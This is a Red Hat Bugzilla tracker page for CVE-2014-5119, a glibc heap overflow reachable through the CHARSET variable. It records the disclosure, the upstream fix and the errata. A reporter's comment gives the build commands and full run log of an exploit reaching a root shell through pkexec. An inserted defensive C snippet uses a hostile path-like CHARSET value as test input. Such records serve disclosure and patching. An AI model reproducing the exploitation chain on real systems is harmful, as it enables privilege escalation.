Bug 1119128 (CVE-2014-5119) - CVE-2014-5119 glibc: off-by-one error leading to a heap-based buffer overflow flaw in __gconv_translit_find()
Summary: CVE-2014-5119 glibc: off-by-one error leading to a heap-based buffer overflow...
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2014-5119
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: high
Severity: high
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL: https://sourceware.org/ml/libc-alpha/...
Whiteboard:
Duplicates: 1129743 (view as bug list)
Depends On: 1129745 1133807 1133808 1133809 1133810 1133811 1133812 1134210 1134211 1134212 1134213
Blocks: 1119129 1129744
Reported: 2014-07-14 05:30 UTC by Murray McAllister
Modified: 2021-02-17 06:24 UTC (History)
CC: 35 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
An off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application.
Clone Of:
Environment:
Last Closed: 2014-08-29 21:50:01 UTC


Attachments
CVE-2014-5119 exploit for Fedora 20 32-bit (5.92 KB, application/octet-stream), attached 2014-08-26 02:00 UTC by Tavis Ormandy


Links
System | ID | Private | Priority | Status | Summary | Last Updated
Red Hat Knowledge Base (Solution) | 1176253 | 0 | None | None | None | Never
Red Hat Product Errata | RHSA-2014:1110 | 0 | normal | SHIPPED_LIVE | Important: glibc security update | 2014-08-30 01:40:58 UTC
Red Hat Product Errata | RHSA-2014:1118 | 0 | normal | SHIPPED_LIVE | Important: glibc security update | 2014-09-02 22:09:39 UTC
Sourceware | 17187 | 0 | P2 | RESOLVED | Out-of-bounds NUL write in iconv_open (CVE-2014-5119) | 2021-02-06 19:16:23 UTC

Description Murray McAllister 2014-07-14 05:30:08 UTC
Tavis Ormandy reported an off-by-one error leading to a heap-based buffer overflow flaw in glibc's __gconv_translit_find() function. This could be triggered by setting the CHARSET environment variable to a malicious value. This could possibly lead to code execution as root if a set user ID (setuid) root application used this environment variable without sanitizing its value.

References:

http://www.openwall.com/lists/oss-security/2014/07/14/1
http://www.openwall.com/lists/oss-security/2014/07/14/2
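The description above notes that the attack surface is a setuid program that lets an untrusted CHARSET value flow into glibc without sanitizing it. The following is an added example, not code from glibc, Red Hat, or the reporter, of the whitelist such a program can apply before any call that can end up in iconv_open() or setlocale(). The length bound (32) and the permitted character set [A-Za-z0-9._:-] are this example's own assumptions about what a legitimate charset name looks like; '/' is rejected outright so that "//TRANSLIT"-style modifiers and path-like values never reach the transliteration lookup.

```c
/* Added example: whitelist the CHARSET environment variable before a
 * privileged program lets glibc consume it.  Not glibc's or Red Hat's
 * code; the limits below are assumptions made for this example. */
#include <ctype.h>
#include <iconv.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumption: no legitimate charset name (e.g. "ISO_8859-1:1987",
 * "ANSI_X3.4-1968") needs more than 32 bytes. */
#define CHARSET_MAX_LEN 32

/* Return 1 if `name` is a plain charset name: non-empty, bounded length,
 * starts with a letter or digit, and uses only [A-Za-z0-9._:-].
 * Anything else (NULL, empty, too long, '/', whitespace, control or
 * non-ASCII bytes) returns 0. */
int charset_is_safe(const char *name)
{
    if (name == NULL || name[0] == '\0')
        return 0;
    if (!isalnum((unsigned char)name[0]))
        return 0;
    for (size_t i = 0; name[i] != '\0'; i++) {
        if (i >= CHARSET_MAX_LEN)
            return 0;               /* longer than any legitimate name */
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == ':' || c == '-'))
            return 0;
    }
    return 1;
}

/* Remove CHARSET from the environment unless it passes the whitelist.
 * Returns 1 if the variable was removed, 0 if it was absent or kept.
 * A setuid program should call this (or scrub its whole environment)
 * before the first locale or iconv call. */
int sanitize_charset_env(void)
{
    const char *cs = getenv("CHARSET");
    if (cs == NULL)
        return 0;
    if (charset_is_safe(cs))
        return 0;
    unsetenv("CHARSET");
    return 1;
}

/* Open a converter from the sanitized CHARSET to UTF-8, defaulting to
 * UTF-8 when the variable is absent or was rejected.  Returns
 * (iconv_t)-1 on failure, as iconv_open() does. */
iconv_t open_from_env_charset(void)
{
    sanitize_charset_env();
    const char *cs = getenv("CHARSET");
    if (cs == NULL)
        cs = "UTF-8";
    return iconv_open("UTF-8", cs);
}

int main(void)
{
    /* Constructed inputs for the demo: one normal value, one hostile. */
    setenv("CHARSET", "ISO-8859-1", 1);
    printf("ISO-8859-1 removed: %d\n", sanitize_charset_env());
    setenv("CHARSET", "../../tmp/evil//TRANSLIT", 1);
    printf("hostile value removed: %d\n", sanitize_charset_env());

    iconv_t cd = open_from_env_charset();
    printf("converter opened: %d\n", cd != (iconv_t)-1);
    if (cd != (iconv_t)-1)
        iconv_close(cd);
    return 0;
}
```

The check is deliberately stricter than what iconv_open() itself accepts: modifiers such as "//TRANSLIT" are legitimate in a tocode argument that the program builds itself, but there is no reason to accept them from an inherited environment variable in a privileged process.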

Comment 6 Murray McAllister 2014-08-15 01:24:34 UTC
MITRE assigned CVE-2014-5119 to this issue:

http://seclists.org/oss-sec/2014/q3/358

Upstream bug:

https://sourceware.org/bugzilla/show_bug.cgi?id=17187

Comment 7 Murray McAllister 2014-08-15 01:28:41 UTC
*** Bug 1129743 has been marked as a duplicate of this bug. ***

Comment 8 Murray McAllister 2014-08-15 01:33:28 UTC
Further information from Tavis Ormandy:

https://sourceware.org/ml/libc-alpha/2014-07/msg00590.html

Comment 9 Tavis Ormandy 2014-08-26 02:00:49 UTC
Created attachment 930687 [details]
CVE-2014-5119 exploit for Fedora 20 32-bit

It's been a few months without progress, here's an exploit.

$ make clean
rm -f pkexploit pty *.o a.out *.so
[taviso@localhost glibc]$ make
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl  pkexploit.c   -o pkexploit
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl  pty.c   -o pty
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320  -c -o exploit.o exploit.c
cc exploit.o -fPIC -shared -o exploit.so
Execute pkexploit to attempt exploitation.
[taviso@localhost glibc]$ ./pkexploit 
[*] ---------------------------------------------------
[*] CVE-2014-5119 glibc __gconv_translit_find() exploit
[*] ------------------------ taviso & scarybeasts -----
[*] Attempting to invoke pseudo-pty helper (this will take a few seconds)...
[*] Read 7295 bytes of output from pseudo-pty helper, parsing...
[*] pseudo-pty helper succeeded
[*] attempting to parse libc fatal error message...
[*] discovered chunk pointer from `corrupted double-lin...`, => 0x507e3658
[*] attempting to parse the libc maps dump...
[*] found libc.so mapped @0x40215000
[*] expecting libc.so bss to begin at 0x406c7000
[*] successfully located first morecore chunk w/tag @0x407d6000
[*] allocating space for argument structure...
[*] creating command string...
[*] creating a tls_dtor_list node...
[*] open_translit() symbol will be at 0x40238320
[*] offsetof(struct known_trans, fname) => 32
[*] appending `./exploit.so` to list node
[*] building parameter list...
[*] anticipating tls_dtor_list to be at 0x406c82d4
[*] execvpe(pkexec...)...
Error accessing /: File name too long
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),1000(taviso) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
exit

Comment 10 Huzaifa S. Sidhpurwala 2014-08-26 03:16:32 UTC
Statement:

(none)

Comment 14 Tomas Hoger 2014-08-26 18:42:05 UTC
Upstream commit:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commitdiff;h=a1a6a401ab0a3c9f15fb7eaebbdcee24192254e8

It removes affected functionality - support for loadable gconv transliteration modules - which was non-functional for a long time.

Comment 16 Martin Prpič 2014-08-26 21:12:39 UTC
IssueDescription:

An off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application.

Comment 32 errata-xmlrpc 2014-08-29 21:41:25 UTC
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5
  Red Hat Enterprise Linux 6
  Red Hat Enterprise Linux 7

Via RHSA-2014:1110 https://rhn.redhat.com/errata/RHSA-2014-1110.html

Comment 34 errata-xmlrpc 2014-09-02 18:11:38 UTC
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5.6 Long Life
  Red Hat Enterprise Linux 5.9 EUS - Server Only
  Red Hat Enterprise Linux 6.2 AUS
  Red Hat Enterprise Linux 6.4 EUS - Server and Compute Node Only

Via RHSA-2014:1118 https://rhn.redhat.com/errata/RHSA-2014-1118.html

